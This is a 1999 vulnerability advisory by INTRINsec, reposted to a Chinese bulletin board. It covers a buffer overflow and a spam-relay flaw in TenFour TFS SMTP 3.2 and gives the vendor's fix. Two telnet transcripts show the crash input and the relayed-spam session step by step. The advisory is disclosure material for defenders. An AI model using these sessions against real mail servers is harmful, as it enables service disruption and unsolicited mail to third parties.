tenfour tfs smtp 3.2 buffer overflow.txt

網絡安全方面的書籍,非常好,本人從事嵌入linux以及網絡方面的研究

发信人: cloudsky (晓舟·轩辕明月), 信区: Security 
标  题: [SECURITY] TenFour TFS SMTP 3.2 Buffer Overflow 
发信站: 武汉白云黄鹤站 (Thu Sep  9 08:43:07 1999), 站内信件 
  
 INTRINsec Security Advisory 
  
  
Release Date     : August 30, 1999 
Software        : TenFour TFS SMTP 3.2 
Operating System: Windows NT 3.x / 4.x 
Impact                : The attackers can use a misconfigured TFS SMTP for 
                  spamming and can remotely crash the TFS SMTP Gateway. 
Author                : Christophe.Lesur@INTRINsec.com 
Status                : TenFour is advised from this. 
URLs                : http://www.intrinsec.com/ 
  
  
__ Diggest __ 
  
  
The TenFour TFS SMTP Release 3.2 has two vulnerabilities : A buffer overflow 
and, under some circumstances and due to inherent TFS architecture, it can 
be used for spamming. 
  
Direct results are that an attacker can remotly crash your TFS SMTP Gateway 
or send unsollicited mails to someone ( and TFS ADMINISTRATOR ). 
  
Tenfour is advised from this. Thanks to Roberto Correnti for his support. 
(http://www.tenfour.com) 
  
  
__ Technical Details and Exploits __ 
  
  
TENFOUR TFS SMTP Version 3.2 has two vulnerabilities : a buffer overflow and 
under some circumstances it can be used for spamming. 
  
First :  Buffer Overflow. 
  
There is a major buffer overflow in TFS SMTP 3.2. When you connect to the 
SMTP service on port 25, you get the TFS PROMPT. After sending the 'helo' 
command, if you send a 'MAIL FROM' larger than 128 bytes, you will crash the 
SMTP service with a nice protection fault. It's basically a buffer overflow 
and this has been fixed in release 4.0 
  
This is the exploit : 
  
  
         [clesur@raptor clesur]$ telnet mailhost.victim.com 25 
         Trying 1.1.1.1... 
         Connected to mailhost.victim.com. 
         Escape character is '^]'. 
         220 mailhost.victim.com is ready. TFS SMTP Server ver 3.2 
         helo 
         250 mailhost.victim.com, Hello 
  
         mail from:<ddddddddddddd ... lots of char ... dddddddddddddddd> 
  
         Connection closed by foreign host. 
  
  
  
Second : Spamming 
  
The TFS SMTP Engine accepts any mails by default and process them in its kernel. 
In case of a deficient message (wrong recipient, wrong domain...) TFS SMTP is 
usually configured to warn sender and the TFS ADMINISTRATOR by sending a 4-line 
arning 
AND the full message. Because there is no domain check before sending the messag 
 to 
the TFS core, it's possible to spam someone and the TFS administrator. 
  
  
This is the exploit : 
  
  
          [clesur@raptor clesur]$ telnet mailhost.tfsvictim.com 25 
          Trying 1.1.1.1... 
          Connected to mailhost.tfsvictim.com. 
          Escape character is '^]'. 
          220 mailhost.tfsvictim.com is ready. TFS SMTP Server ver 3.2 
          helo 
          250 mailhost.tfsvictim.com, Hello 
          mail from:<target@victim.com> 
          250 Sender <target@victim.com> OK 
          rcpt to:<target@victim.com> 
          250 Recipient <target@victim.com> OK 
          data 
          354 Begin data transfer. End with period. 
          from: target@victim.com 
          to: target@victim.com 
  
          <YOUR MESSAGE BODY HERE> 
          . 
  
          250 Message accepted 
          quit 
          221 Connection closed 
          Connection closed by foreign host. 
  
  
The spammed user will receive this message in its mailbox. 
  
          Message 22: 
          From target@victim.com Thu Jul 29 09:49:40 1999 
          Delivered-To: target@victim.com 
          From: target@victim.com 
          Date: Thu, 29 Jul 1999 11:44:03 +0200 
          Subject: <No subject> 
          MIME-version: 1.0 
          Content-transfer-encoding: quoted-printable 
  
          #################################################### 
          This message was not delivered to 
          target@victim.com 
          TFS Admin was informed with a copy of this message 
          Sender was informed with a copy of this message 
          #################################################### 
  
          <YOUR MESSAGE BODY HERE> 
  
  
__ Solutions __ 
  
For theses vulnerabilities, TenFour suggests upgrading to a version greater 
than 4.0. 
  
__ Contacts __ 
  
  
 -- Tenfour -- 
  
 TenFour South Europe 
 ITFamily Sarl 
 Le Technoparc 
 15, rue Edouard Jeanneret 
 78306 Poissy Cedex 
 France 
 Tel: +33 1 39 22 65 15 
 Fax: +33 1 39 11 49 77 
 WWW: http://www.tenfour.fr 
  
 -- INTRINsec -- 
  
 INTRINsec is a computer Security company. 
 http://www.INTRINsec.com 
 This advisory is available in french. 
 Cet avis est disponible en francais sur notre site. 
  
  
__ DISCLAMERS __ 
  
  
INTRINsec DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, AND PROVIDED 

THESES INFORMATIONS "AS IS" WITHOUT WARRANTY OF ANY KIND. INTRINsec IS NOT 
LIABLE FOR ANY DAMAGES WHATSOEVER EVEN IF INTRINsec HAS BEEN ADVISED OF THE 
POSSIBILITY OF SUCH DAMAGES. 
  
-- 
Christophe Lesur         Security Consultant 
INTRINsec 
mailto:christophe.lesur@INTRINsec.com 
  
-- 
            我问飘逝的风：来迟了？ 
            风感慨：是的，他们已经宣战。 
            我问苏醒的大地：还有希望么？ 
            大地揉了揉眼睛：还有，还有无数代的少年。 
            我问长空中的英魂：你们相信？ 
            英魂带着笑意离去：相信，希望还在。